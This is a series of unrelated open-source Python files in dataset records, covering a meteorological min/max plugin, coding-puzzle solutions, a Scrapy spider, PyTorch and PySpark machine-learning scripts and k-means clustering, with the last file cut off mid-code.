result field, defaults to None\n    :type nomvar_min: str or list of str, optional\n    :param nomvar_max: nomvar of max result field, defaults to None\n    :type nomvar_max: str or list of str, optional\n    \"\"\"\n    @initializer\n    def __init__(self, df: pd.DataFrame, \n                 nomvar:str=None, min:bool=False, max:bool=False, \n                 forecast_hour_range=None, interval=None, step=None, \n                 nomvar_min=None, nomvar_max=None):\n        \n        self.validate_input()\n\n    def validate_input(self):\n        if self.df.empty:\n            raise TimeIntervalMinMaxError('No data to process')\n\n        self.df = fstpy.metadata_cleanup(self.df)\n\n        self.df = fstpy.add_columns(self.df, ['forecast_hour'])\n\n        if (self.nomvar is None) or (self.forecast_hour_range is None):\n            raise TimeIntervalMinMaxError(\n                'One of the mandatory parameters (nomvar, forecast_hour_range) is None')\n\n        self.nomvar = validate_list_of_nomvar(self.nomvar, 'TimeIntervalMinMax', TimeIntervalMinMaxError)\n        l_nomvar = len(self.nomvar)\n\n        if (self.min is None) and (self.max is None):\n            self.min = True\n            self.max = True\n\n        if self.min & (self.nomvar_min is None):\n            self.nomvar_min = [''.join(['V',str(i),'MN']) for i in range(1,l_nomvar+1)]\n\n        if self.max & (self.nomvar_max is None):\n            self.nomvar_max = [''.join(['V',str(i),'MX']) for i in range(1,l_nomvar+1)]\n\n        if self.min:\n            self.nomvar_min = validate_list_of_nomvar(self.nomvar_min, 'TimeIntervalMinMax', TimeIntervalMinMaxError)\n            l_nbmin = len(self.nomvar_min)\n            if l_nomvar != l_nbmin:\n                raise TimeIntervalMinMaxError('There must be the same number of output nomvar as there are inputs')\n            self.df['nomvar_min'] = None\n            for nomvar,nomvar_min in zip(self.nomvar,self.nomvar_min):\n                self.df.loc[self.df.nomvar==nomvar,'nomvar_min'] = nomvar_min\n        if self.max: \n            self.nomvar_max = validate_list_of_nomvar(self.nomvar_max, 'TimeIntervalMinMax', TimeIntervalMinMaxError)\n            l_nbmax = len(self.nomvar_max)\n            if l_nomvar != l_nbmax:\n                raise TimeIntervalMinMaxError('There must be the same number of output nomvar as there are inputs')\n            self.df['nomvar_max'] = None\n            for nomvar,nomvar_max in zip(self.nomvar,self.nomvar_max):\n                self.df.loc[self.df.nomvar==nomvar,'nomvar_max'] = nomvar_max \n\n\n        self.forecast_hour_range = validate_list_of_tuples_of_times(self.forecast_hour_range, TimeIntervalMinMaxError)\n        l_fcast = len(self.forecast_hour_range)\n\n        if self.step is None:\n            self.step = [datetime.timedelta(hours=1) for i in range(l_fcast)]\n        else:\n            self.step = validate_list_of_times(self.step, TimeIntervalMinMaxError)\n\n        if self.interval is None:\n            self.interval = [(i[1] - i[0]) for i in self.forecast_hour_range]\n        else:\n            self.interval = validate_list_of_times(self.interval, TimeIntervalMinMaxError) \n\n        l_int = len(self.interval)\n        l_step = len(self.step)\n        \n        if l_fcast != l_int or l_fcast != l_step:\n            raise TimeIntervalMinMaxError('All lists must be the same length')\n\n        for i in range(len(self.interval)):\n            if self.interval[i] > self.forecast_hour_range[i][1] - self.forecast_hour_range[i][0]:\n                raise TimeIntervalMinMaxError(\n                    'The interval must be lower or equal to upper bound minus lower bound of forecast_hour_range.')\n\n        self.meta_df = self.df.loc[self.df.nomvar.isin(\n            [\"^^\", \">>\", \"^>\", \"!!\", \"!!SF\", \"HY\", \"P0\", \"PT\"])].reset_index(drop=True)\n\n        self.df_without_intervals = self.df.loc[(~self.df.nomvar.isin(\n            [\"^^\", \">>\", \"^>\", \"!!\", \"!!SF\", \"HY\", \"P0\", \"PT\"])) & (self.df.interval.isna()) & (self.df.nomvar.isin(self.nomvar))].reset_index(drop=True)\n\n        self.df_with_intervals = 
self.df.loc[(~self.df.nomvar.isin(\n [\"^^\", \">>\", \"^>\", \"!!\", \"!!SF\", \"HY\", \"P0\", \"PT\"])) & (~self.df.interval.isna()) & (self.df.nomvar.isin(self.nomvar))].reset_index(drop=True)\n\n self.groups_without_interval = self.df_without_intervals.groupby(['grid', 'nomvar','ip1_kind'])\n self.groups_with_interval = self.df_with_intervals.groupby(['grid', 'nomvar','ip1_kind'])\n\n\n def compute(self) -> pd.DataFrame:\n logging.info('TimeIntervalMinMax - compute\\n')\n\n self.forecast_hours = get_list_of_forecast_hours(self.forecast_hour_range, self.interval, self.step)\n\n if len(self.forecast_hours) == 0:\n raise TimeIntervalMinMaxError('Unable to calculate intervals with provided parameters')\n df_list = []\n for _, current_group in self.groups_with_interval:\n \n current_group['lower_bound'] = current_group['interval'].map(get_lower_bound)\n current_group['upper_bound'] = current_group['interval'].map(get_upper_bound)\n \n diffs = []\n incomplete = False\n for forecast_hours in self.forecast_hours:\n b_inf = forecast_hours[0]\n b_sup = forecast_hours[1]\n \n interval_df = current_group.loc[current_group.lower_bound.astype('int32').between(b_inf,b_sup, inclusive='both')]\n\n if interval_df.empty:\n interval_df = current_group.loc[current_group.upper_bound.astype('int32').between(b_inf,b_sup, inclusive='both')]\n if interval_df.empty:\n logging.warning(f'No data found for interval: {int(b_inf/3600)} @ {int(b_sup/3600)}')\n incomplete = True\n break\n \n res_df = self.process(current_group, interval_df, b_inf, b_sup)\n\n diffs.append(res_df)\n\n if not incomplete:\n for df in diffs:\n df.drop(columns=['lower_bound','upper_bound'])\n df_list.append(df)\n\n for _, current_group in self.groups_without_interval:\n\n diffs = []\n incomplete = False\n for forecast_hours in self.forecast_hours:\n b_inf = forecast_hours[0]\n b_sup = forecast_hours[1]\n \n interval_df = current_group.loc[current_group.forecast_hour.dt.total_seconds().astype('int32').between(b_inf,b_sup, inclusive='both')]\n\n if interval_df.empty:\n logging.warning(f'No data found for interval: {int(b_inf/3600)} @ {int(b_sup/3600)}')\n incomplete = True\n break\n \n res_df = self.process(current_group, interval_df, b_inf, b_sup)\n\n diffs.append(res_df)\n\n if not incomplete:\n for df in diffs:\n df_list.append(df)\n\n\n return final_results(df_list, TimeIntervalMinMaxError, self.meta_df)\n\n def process(self, current_group, interval_df, b_inf, b_sup):\n arr3d = da.stack(interval_df['d'])\n results = []\n if self.min:\n # set new ip2, ip3 and npas\n nomvar_min = current_group.iloc[0].nomvar_min\n min_df = create_result_container(current_group, b_inf, b_sup, nomvar_min)\n min_df.at[0, 'd'] = np.min(arr3d, axis=0)\n results.append(min_df)\n if self.max: \n # set new ip2, ip3 and npas\n nomvar_max = current_group.iloc[0].nomvar_max\n max_df = create_result_container(current_group, b_inf, b_sup, nomvar_max)\n max_df.at[0, 'd'] = np.max(arr3d, axis=0)\n results.append(max_df)\n\n res_df = pd.concat(results, ignore_index=True)\n\n return res_df\n\n @staticmethod\n def parse_config(args: str) -> dict:\n \"\"\"method to translate spooki plugin parameters to python plugin parameters\n :param args: input unparsed arguments\n :type args: str\n :return: a dictionnary of converted parameters\n :rtype: dict\n \"\"\"\n parser = PluginParser(prog=TimeIntervalMinMax.__name__, parents=[Plugin.base_parser],add_help=False)\n parser.add_argument('--fieldName',required=True,type=str,dest='nomvar', help=\"List of field names.\")\n 
parser.add_argument('--interval',type=str, help=\"List of the time intervals between inputs within each time range, used for the minimum/maximum calculation.\")\n        parser.add_argument('--rangeForecastHour',required=True,type=str,dest='forecast_hour_range', help=\"List of time ranges in hours.\")\n        parser.add_argument('--step',type=str, help=\"List of the time steps in hours between successive start times within each time range.\")\n        parser.add_argument('--outputFieldNameMax',type=str,dest='nomvar_max',help=\"List of names of maximum fields.\")\n        parser.add_argument('--outputFieldNameMin',type=str,dest='nomvar_min',help=\"List of names of minimum fields.\")\n        parser.add_argument('--type',type=str,required=True,choices=[\"MIN\",\"MAX\",\"BOTH\"], help=\"Calculation of minimum and/or maximum.\")\n\n        parsed_arg = vars(parser.parse_args(args.split()))\n\n        if parsed_arg['type'] == \"MIN\":\n            parsed_arg['min'] = True\n        elif parsed_arg['type'] == \"MAX\":\n            parsed_arg['max'] = True\n        else:\n            parsed_arg['min'] = True\n            parsed_arg['max'] = True\n\n        if parsed_arg['interval'] is not None:\n            parsed_arg['interval'] = apply_lambda_to_list(parsed_arg['interval'].split(','), lambda a: convert_time(a))\n        if parsed_arg['step'] is not None:\n            parsed_arg['step'] = apply_lambda_to_list(parsed_arg['step'].split(','), lambda a: convert_time(a))\n        parsed_arg['forecast_hour_range'] = apply_lambda_to_list(parsed_arg['forecast_hour_range'].split(','), lambda a: convert_time_range(a))\n\n        parsed_arg['nomvar'] = parsed_arg['nomvar'].split(',')\n        apply_lambda_to_list(parsed_arg['nomvar'],lambda a : validate_nomvar(a,\"TimeIntervalMinMax\",TimeIntervalMinMaxError))\n\n        if parsed_arg['nomvar_max'] is not None:\n            parsed_arg['nomvar_max'] = parsed_arg['nomvar_max'].split(',')\n            apply_lambda_to_list(parsed_arg['nomvar_max'],lambda a : True if a is None else validate_nomvar(a,\"TimeIntervalMinMax\",TimeIntervalMinMaxError))\n        if parsed_arg['nomvar_min'] is not None:\n            parsed_arg['nomvar_min'] = parsed_arg['nomvar_min'].split(',')\n            apply_lambda_to_list(parsed_arg['nomvar_min'],lambda a : True if a is None else validate_nomvar(a,\"TimeIntervalMinMax\",TimeIntervalMinMaxError))\n\n        return parsed_arg\n\ndef create_result_container(df, b_inf, b_sup, nomvar):\n    deet = df.iloc[0]['deet']\n    npas = int(b_sup / deet)\n    # npas = int((ip2 * 3600) / deet)\n\n    inter = fstpy.Interval('ip2', b_inf, b_sup, 10)\n    res_df = create_empty_result(df, {'nomvar':nomvar, 'etiket':'TIMNMX',\n                                      'interval':inter, 'npas': npas})\n    return res_df\n\ndef check_for_negative_values(arr, location):\n    if np.any(np.where(arr < 0.,True,False)):\n        logging.warning(f\"Found a negative value in the {location}! 
Probable cause is loss of precision when converting to float computational type\")\n logging.warning(f'The lowest found negative value was : {to_numpy(np.min(arr))}')\n\n\ndef get_lower_bound(interval):\n return interval.low*3600\n\ndef get_upper_bound(interval):\n return interval.high*3600\n","repo_name":"sebastiendfortier/spookipy","sub_path":"spookipy/timeintervalminmax/timeintervalminmax.py","file_name":"timeintervalminmax.py","file_ext":"py","file_size_in_byte":13133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"36439666251","text":"# Day 2\n# To fix: pad array and check for pad, won't need to check range, same function for both parts\n\nfrom day0 import *\n\n\ndef part1(data):\n \"\"\" run part 1\"\"\"\n # Keypad\n # 1 2 3\n # 4 5 6\n # 7 8 9\n keypad = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])\n buttons = 0\n\n row = 1\n col = 1\n\n for line in data:\n for char in line:\n nr = row\n nc = col\n if char == 'U':\n nr -= 1\n elif char == 'D':\n nr += 1\n elif char == 'L':\n nc -= 1\n else:\n nc += 1\n if nr in range(0, 3) and nc in range(0, 3):\n row = nr\n col = nc\n buttons = buttons*10 + (keypad[row, col])\n\n print(buttons)\n return buttons\n\n\ndef part2(data):\n \"\"\"run part 2\"\"\"\n\n # Keypad\n # 0 0 1 0 0\n # 0 2 3 4 0\n # 5 6 7 8 9\n # 0 A B C 0\n # 0 0 D 0 0\n keypad = np.array([[0, 0, 1, 0, 0], [0, 2, 3, 4, 0], [5, 6, 7, 8, 9], [0, 'A', 'B', 'C', 0], [0, 0, 'D', 0, 0]])\n buttons = []\n\n row = 2\n col = 0\n\n for line in data:\n for char in line:\n nr = row\n nc = col\n if char == 'U':\n nr -= 1\n elif char == 'D':\n nr += 1\n elif char == 'L':\n nc -= 1\n else:\n nc += 1\n if nr in range(0, len(keypad)) and nc in range(0, len(keypad)):\n if not keypad[nr, nc] == '0':\n row = nr\n col = nc\n print(\"Row: \" + str(row) + \" Col: \" + str(col))\n print(keypad[nr, nc])\n buttons.append(keypad[row, col])\n\n print(buttons)\n return ''.join(buttons)\n\n\nif __name__ == \"__main__\":\n data = Input(2).read().split()\n # part1(data)\n print(part2(data))","repo_name":"brianshin22/advent","sub_path":"day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"1026004552","text":"#User function Template for python3\n[]\nclass Solution:\n def arraySortedOrNot(self, arr, n):\n left = 0\n right = 1\n while right < n:\n if arr[left] > arr[right]:\n return 0\n else:\n left +=1\n right +=1\n return 1\n\n\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\nif __name__ == '__main__':\n tc = int(input())\n while tc > 0:\n n = int(input())\n arr = list(map(int, input().strip().split()))\n \n ob = Solution()\n ans = ob.arraySortedOrNot(arr, n)\n if ans:\n print(1)\n else:\n print(0)\n tc -= 1\n\n# } Driver Code Ends","repo_name":"abrahamshimekt/Competitive-Programming-Problem-Solutions","sub_path":"Check if array is sorted - GFG/check-if-array-is-sorted.py","file_name":"check-if-array-is-sorted.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"41178273414","text":"import scrapy\n\nclass CountrySpider(scrapy.Spider):\n\n name = 'country'\n\n def start_requests(self):\n urls = [\n 'https://www.lonelyplanet.com/places'\n ]\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse(self, response):\n for country in response.css('div.grid-wrapper--10 a.card--list 
h3.card--list__name::text').extract():\n yield {\n 'name': country[1:-1]\n }","repo_name":"chesiver/CS6400_Travel_Recommend","sub_path":"scrapy_travel_recommend/scrapy_travel_recommend/spiders/country_spider.py","file_name":"country_spider.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28714139514","text":"import argparse\nimport os\nimport torch\n\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nimport torchvision.transforms as transforms\n\nfrom PIL import Image \nfrom models import E1, E2, Decoder\nfrom utils import load_model_for_eval, get_test_imgs\nimport torchvision.utils as vutils\nimport functools \n\n@functools.lru_cache(maxsize=2)\ndef get_transform(crop, resize):\n comp_transform = transforms.Compose([\n transforms.CenterCrop(crop),\n transforms.Resize(resize),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ])\n return comp_transform\n\ndef default_loader(filepath):\n return Image.open(filepath).convert('RGB')\n\ndef load_image(filepath, crop, resize):\n image = default_loader(filepath)\n comp_transform = get_transform(crop, resize)\n image = comp_transform(image)\n return image\n\ndef load_image_tensor(filepath, crop, resize):\n image = load_image(filepath, crop, resize)\n \n with torch.no_grad(): \n image = Variable(image)\n if torch.cuda.is_available():\n image = image.cuda()\n \n return image\n\ndef my_get_test_imgs(args):\n human = []\n with open(os.path.join(args.root, 'testA.txt')) as file:\n for datapath in file.readlines():\n datapath = datapath.strip()\n human_tensor = load_image_tensor(datapath, args.cropA, args.resize)\n human.append(human_tensor)\n\n cartoon = []\n with open(os.path.join(args.root, 'testB.txt')) as file:\n for datapath in file.readlines():\n datapath = datapath.strip()\n cartoon_tensor = load_image_tensor(datapath, args.cropB, args.resize)\n cartoon.append(cartoon_tensor)\n \n return human, cartoon\n\ndef trans(args, idx, test_domA, test_domB, rc_e1, rc_e2, rc_decoder, c_e1, c_e2, c_decoder):\n print(idx)\n \n exps = []\n\n # --------------- real images --------------- # \n with torch.no_grad():\n exps.append(test_domA.unsqueeze(0))\n \n # --------------- real2cartoon images --------------- #\n intput_cartoons = []\n separate_A = torch.full((1, args.sep * (args.resize // 64) * (args.resize // 64)), 0).cuda()\n common_A = rc_e1(test_domA.unsqueeze(0))\n A_encoding = torch.cat([common_A, separate_A], dim=1)\n A_decoding = rc_decoder(A_encoding)\n exps.append(A_decoding)\n intput_cartoons.append(A_decoding)\n \n # --------------- cartoon2cartoon images --------------- #\n output_cartoons = []\n separate_A = c_e2(test_domB.unsqueeze(0))\n common_B = c_e1(intput_cartoons[0])\n BA_encoding = torch.cat([common_B, separate_A], dim=1)\n BA_decoding = c_decoder(BA_encoding)\n exps.append(BA_decoding)\n output_cartoons.append(BA_decoding)\n \n # --------------- cartoon2real images --------------- #\n separate_A = rc_e2(test_domA.unsqueeze(0))\n common_B = rc_e1(output_cartoons[0])\n BA_encoding = torch.cat([common_B, separate_A], dim=1)\n BA_decoding = rc_decoder(BA_encoding)\n exps.append(BA_decoding)\n \n # ------------- reference cartoon images ------------- # \n with torch.no_grad():\n exps.append(test_domB.unsqueeze(0))\n \n with torch.no_grad():\n exps = torch.cat(exps, 0)\n \n vutils.save_image(exps,\n '%s/experiments_%s.png' % (args.out, idx),\n normalize=True, 
nrow=args.num_display) \n \ndef test(args):\n # ---------- load model_real_cartoon ---------- #\n \n rc_e1 = E1(args.sep, int((args.resize / 64)))\n rc_e2 = E2(args.sep, int((args.resize / 64)))\n rc_decoder = Decoder(int((args.resize / 64)))\n\n if torch.cuda.is_available():\n rc_e1 = rc_e1.cuda()\n rc_e2 = rc_e2.cuda()\n rc_decoder = rc_decoder.cuda()\n\n if args.load_rc != '':\n save_file = os.path.join(args.load_rc)\n load_model_for_eval(save_file, rc_e1, rc_e2, rc_decoder)\n\n rc_e1 = rc_e1.eval()\n rc_e2 = rc_e2.eval()\n rc_decoder = rc_decoder.eval()\n \n # ---------- load model_cartoon ---------- #\n \n c_e1 = E1(args.sep, int((args.resize / 64)))\n c_e2 = E2(args.sep, int((args.resize / 64)))\n c_decoder = Decoder(int((args.resize / 64)))\n\n if torch.cuda.is_available():\n c_e1 = c_e1.cuda()\n c_e2 = c_e2.cuda()\n c_decoder = c_decoder.cuda()\n\n if args.load_c != '':\n save_file = os.path.join(args.load_c)\n load_model_for_eval(save_file, c_e1, c_e2, c_decoder)\n\n c_e1 = c_e1.eval()\n c_e2 = c_e2.eval()\n c_decoder = c_decoder.eval()\n \n # -------------- running -------------- #\n \n if not os.path.exists(args.out) and args.out != \"\":\n os.mkdir(args.out)\n\n# trans(args, rc_e1, rc_e2, rc_decoder, c_e1, c_e2, c_decoder)\n test_domA_cluster, test_domB_cluster = my_get_test_imgs(args)\n for idx, (test_domA, test_domB) in enumerate(list(zip(test_domA_cluster, test_domB_cluster))):\n trans(args, idx, test_domA, test_domB, rc_e1, rc_e2, rc_decoder, c_e1, c_e2, c_decoder)\n\nif __name__=='__main__':\n \"\"\"\n python joint_lyk.py --load_rc /home/aailyk057pku/winter-camp-pek/model/checkpoint --load_c /home/aailyk057pku/winter-camp-pek/model/checkpoint_40000\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--root', default='data_joint')\n parser.add_argument('--load_rc', default='')\n parser.add_argument('--load_c', default='')\n parser.add_argument('--out', default='joint')\n parser.add_argument('--resize', type=int, default=128)\n parser.add_argument('--cropA', type=int, default=178)\n parser.add_argument('--cropB', type=int, default=378)\n parser.add_argument('--sep', type=int, default=25)\n parser.add_argument('--bs', type=int, default=64)\n parser.add_argument('--num_display', type=int, default=20)\n\n args = parser.parse_args()\n\n test(args)","repo_name":"dingmyu/winter_camp","sub_path":"code/joint_lyk.py","file_name":"joint_lyk.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28926945487","text":"#Problem 8 from Project Euler\n#Solution by Paul Barton\n#\n#Here is the text of the problem:\n#Find the greatest product of five consecutive digits in the 1000-digit number.\n# 7316717653133...420752963450\n#(I stored the full number in the text file named \"PE_8.txt\")\n#\n#My strategy is to simply parse the number into a list/string of single digits\n#and calculate the products, keeping the largest number as I go along\n\nimport time\n\ndef digitsProduct(input_string):\n '''Accepts a string of digits to convert to integers; returns their product'''\n val = 1\n for digit in input_string:\n val = val * int(digit)\n return val\n\nt = time.time()\n\nwith open('PE_8.txt', 'r') as mynum:\n n = mynum.read()\n\nwindow = 5 # Set the window size, 5 for the described problem\ngreatest = 0 # Store greatest value\n\nfor i in xrange(len(n) - window + 1): # Scan through the string\n val = digitsProduct(n[i: i + window]) # Product value\n if val > greatest:\n greatest = 
val\n\nprint('The greatest product of digits found was: {0}'.format(greatest))\nprint('This took {0} seconds'.format(time.time() - t))\n    ","repo_name":"SavinaRoja/challenges","sub_path":"Project_Euler/1-10/PE_8.py","file_name":"PE_8.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"29039887760","text":"class Solution:\n    def minAreaRect(self, points: List[List[int]]) -> int:\n        points.sort()\n        points_set = set([tuple(point) for point in points])\n        smallest = float('inf')\n        for i, (x1, y1) in enumerate(points):\n            for j, (x2, y2) in enumerate(points[i:], i):\n                if x1 < x2 and y1 < y2 and (x1, y2) in points_set and (x2, y1) in points_set:\n                    area = (x2 - x1) * (y2 - y1)\n                    smallest = min(smallest, area)\n        return smallest if smallest != float('inf') else 0","repo_name":"Hangpanbee/LeetcodeDump","sub_path":"939-minimum-area-rectangle/939-minimum-area-rectangle.py","file_name":"939-minimum-area-rectangle.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"2805401892","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 10 23:28:54 2020\n\n@author: JESUS\n\"\"\"\n\n\n\t\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sb\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import pairwise_distances_argmin_min\n\n\ndatos=pd.read_csv('german.csv')\n\n_,idx = np.unique(datos['Trabajo'],return_inverse=True)\ndatos['Trabajo'] = idx\nprint(datos['Trabajo'])\n\n \nfrom mpl_toolkits.mplot3d import Axes3D\nplt.rcParams['figure.figsize'] = (16, 9)\nplt.style.use('ggplot')\n\ndataframe = pd.read_csv(r\"analisis.csv\")\nprint(dataframe.head())\nprint(dataframe.groupby('categoria').size())\n#sb.pairplot(dataframe.dropna(), hue='categoria',size=4,vars=[\"op\",\"ex\",\"ag\"],kind='scatter')\nX = np.array(dataframe[[\"op\",\"ex\",\"ag\"]])\ny = np.array(dataframe['categoria'])\nX.shape\n\n\"\"\"\nfig = plt.figure()\nax = Axes3D(fig)\ncolores=['blue','red','green','blue','cyan','yellow','orange','black','pink','brown','purple']\nasignar=[]\nfor row in y:\n    asignar.append(colores[row])\nax.scatter(X[:, 0], X[:, 1], X[:, 2], c=asignar,s=60)\n\"\"\"\n\nkmeans = KMeans(n_clusters=5).fit(X)\ncentroids = kmeans.cluster_centers_\nprint(centroids)\n\n# Predicting the clusters\nlabels = kmeans.predict(X)\n# Getting the cluster centers\nC = kmeans.cluster_centers_\ncolores=['red','green','blue','cyan','yellow']\nasignar=[]\nfor row in labels:\n    asignar.append(colores[row])\n \nfig = plt.figure()\nax = Axes3D(fig)\nax.scatter(X[:, 0], X[:, 1], X[:, 2], c=asignar,s=60)\nax.scatter(C[:, 0], C[:, 1], C[:, 2], marker='*', c=colores, s=1000)","repo_name":"Divier97/la-monda","sub_path":"CODIGOS PYTHON/cluster_1.py","file_name":"cluster_1.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"36256509533","text":"import torch\r\nfrom torch import nn\r\nfrom torch.utils.data import DataLoader\r\nfrom torchvision import datasets\r\nfrom torchvision.transforms import ToTensor, Lambda, Compose\r\nimport matplotlib.pyplot as plt\r\nfrom tqdm import tqdm\r\n\r\n# dataset\r\n# dataloader\r\n# hyperparameter\r\n# define the NeuralNet\r\n# declare the Model\r\n# Loss function, optimizer\r\n# training and test code\r\n\r\n\r\n\r\n    # Every TorchVision Dataset takes two arguments, transform and target_transform, for modifying the samples and the labels respectively.\r\n\r\n# Training dataset download\r\ntraining_data = datasets.FashionMNIST(root=\"data\", train=True, download=True, transform=ToTensor())\r\n# Test dataset download\r\ntest_data = datasets.FashionMNIST(root=\"data\", train=False, download=True, transform=ToTensor())\r\n\r\n    # Pass the Dataset as an argument to DataLoader.\r\n    # It wraps the Dataset in an iterable and supports batching, sampling, shuffling, and multiprocessing data loading.\r\n\r\nbatch_size = 64\r\n\r\n# Create DataLoader\r\ntrain_dataloader = DataLoader(training_data, batch_size=batch_size)\r\ntest_dataloader = DataLoader(test_data, batch_size=batch_size)\r\n\r\nfor X, y in test_dataloader:\r\n    print(\"Shape of X [N(batch), C, H, W]: \", X.shape)\r\n    print(\"Shape of y: \", y.shape, y.dtype)\r\n    break\r\n\r\n# Making Model\r\n'''\r\n - A model is defined by creating a class that inherits from nn.Module.\r\n - The layers are defined in the __init__ function.\r\n - The forward function specifies how data is passed through them.\r\n'''\r\n\r\ndevice = \"cuda\" if torch.cuda.is_available() else 'cpu'\r\nprint(\"using {} device\".format(device))\r\n\r\n\r\n# Define model\r\nclass NeuralNetwork(nn.Module):\r\n    def __init__(self):\r\n        super(NeuralNetwork, self).__init__()\r\n        self.flatten = nn.Flatten()\r\n        self.linear_relu_stack = nn.Sequential(\r\n            nn.Linear(28*28, 512),\r\n            nn.ReLU(),\r\n            nn.Linear(512, 512),\r\n            nn.ReLU(),\r\n            nn.Linear(512, 10),\r\n            nn.ReLU()\r\n        )\r\n\r\n    def forward(self, x):\r\n        x = self.flatten(x)\r\n        logits = self.linear_relu_stack(x)\r\n        return logits\r\n\r\n\r\nmodel = NeuralNetwork().to(device)\r\nprint(model)\r\n\r\nloss_fn = nn.CrossEntropyLoss()\r\noptimizer = torch.optim.SGD(model.parameters(), lr=1e-3)\r\n\r\ndef train(dataloader, model, loss_fn, optimizer):\r\n    size = len(dataloader.dataset)\r\n    for batch, (X, y) in enumerate(dataloader):\r\n        X, y = X.to(device), y.to(device)\r\n\r\n        pred = model(X)\r\n        loss = loss_fn(pred, y)\r\n\r\n        optimizer.zero_grad()\r\n        loss.backward()\r\n        optimizer.step()\r\n\r\n        if batch % 100 == 0:\r\n            loss, current = loss.item(), batch * len(X)\r\n            print(f\"Loss : {loss:>7f} [{current:>5d}/{size:>5d}]\")\r\n\r\n\r\ndef test(dataloader, model, loss_fn):\r\n    size = len(dataloader.dataset)\r\n    num_batches = len(dataloader)\r\n    model.eval()\r\n    test_loss, correct = 0, 0\r\n    with torch.no_grad():\r\n        for X, y in dataloader:\r\n            X, y = X.to(device), y.to(device)\r\n            pred = model(X)\r\n            test_loss += loss_fn(pred, y).item()\r\n            correct += (pred.argmax(1) == y).type(torch.float).sum().item()\r\n    test_loss /= num_batches\r\n    correct /= size\r\n    print(f\"Test error: \\n Accuracy: {(100*correct):>0.1f}%, Avg loss: {test_loss:>8f} \\n\")\r\n\r\n\r\nepochs = 5\r\nfor t in tqdm(range(epochs)):\r\n    print(f\"Epoch {t+1}\\n---------------------------------\")\r\n    train(train_dataloader, model, loss_fn, optimizer)\r\n    test(test_dataloader, model, loss_fn)\r\n\r\nprint(\"Done!\")\r\n\r\ntorch.save(model.state_dict(), \"model.pth\")\r\nprint(\"Saved PyTorch Model State to model.pth\")\r\n\r\nmodel = NeuralNetwork()\r\nmodel.load_state_dict(torch.load(\"model.pth\"))\r\nclasses = [\r\n    \"T-shirt/top\",\r\n    \"Trouser\",\r\n    \"Pullover\",\r\n    \"Dress\",\r\n    \"Coat\",\r\n    \"Sandal\",\r\n    \"Shirt\",\r\n    \"Sneaker\",\r\n    \"Bag\",\r\n    \"Ankle boot\",\r\n]\r\nmodel.eval()\r\nx, y = test_data[0][0], test_data[0][1]\r\nwith torch.no_grad():\r\n    pred = model(x)\r\n    predicted, actual = classes[pred[0].argmax(0)], classes[y]\r\n    print(f'Predicted : \"{predicted}\", Actual : \"{actual}\"')","repo_name":"scyonggg/2021_2_CAPSTONE","sub_path":"format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":4096,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
+{"seq_id":"23598660828","text":"\"\"\"\n@file : 003-logistic_regression_use_pyspark.py\n@author : xiaolu\n@email : luxiaonlp@163.com\n@time : 2021-04-08\n\"\"\"\nimport findspark\nfindspark.init()\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.ml.feature import StringIndexer\nfrom pyspark.ml.feature import VectorAssembler\nfrom pyspark.ml.feature import OneHotEncoder\nfrom pyspark.ml.classification import LogisticRegression\nfrom pyspark.ml.evaluation import BinaryClassificationEvaluator\n\n\ndef analyse_data(df):\n    '''\n    Data analysis\n    :param df:\n    :return:\n    '''\n    # print the schema of the data\n    print(df.printSchema())\n\n    # print the first five rows\n    print(df.show(n=5))\n\n    # quick look at the summary statistics of each feature\n    print(df.describe().show())  # mean and variance are not computed for categorical values\n\n    # group by the country feature to see which country has the most samples\n    print(df.groupby('Country').count().show())\n\n    # see which search engine has the most users\n    print(df.groupby('Platform').count().show())\n\n\ndef feature_process(df):\n    '''\n    Feature engineering\n    :param df:\n    :return:\n    '''\n    # the country and search engine features need to be converted to numeric features\n    search_engine_indexer = StringIndexer(inputCol=\"Platform\", outputCol='Platform_Num').fit(df)\n    df = search_engine_indexer.transform(df)\n    # print(df.show(3))\n    search_engine_encoder = OneHotEncoder(inputCol='Platform_Num', outputCol='Platform_Num_Vec').fit(df)\n    df = search_engine_encoder.transform(df)\n    # print(df.show(3))\n\n    # print('*'*150)\n    # then process the country feature\n    country_indexer = StringIndexer(inputCol=\"Country\", outputCol='Country_Num').fit(df)\n    df = country_indexer.transform(df)\n    # print(df.show(3))\n    country_encoder = OneHotEncoder(inputCol='Country_Num', outputCol='Country_Num_Vec').fit(df)\n    df = country_encoder.transform(df)\n    # print(df.show(3))\n\n    df_assembler = VectorAssembler(\n        inputCols=['Platform_Num_Vec', 'Country_Num_Vec', 'Age', 'Repeat_Visitor', 'Web_pages_viewed'],\n        outputCol='features'\n    )\n    df = df_assembler.transform(df)\n    model_df = df.select(['features', 'Status'])\n    return model_df\n\n\nif __name__ 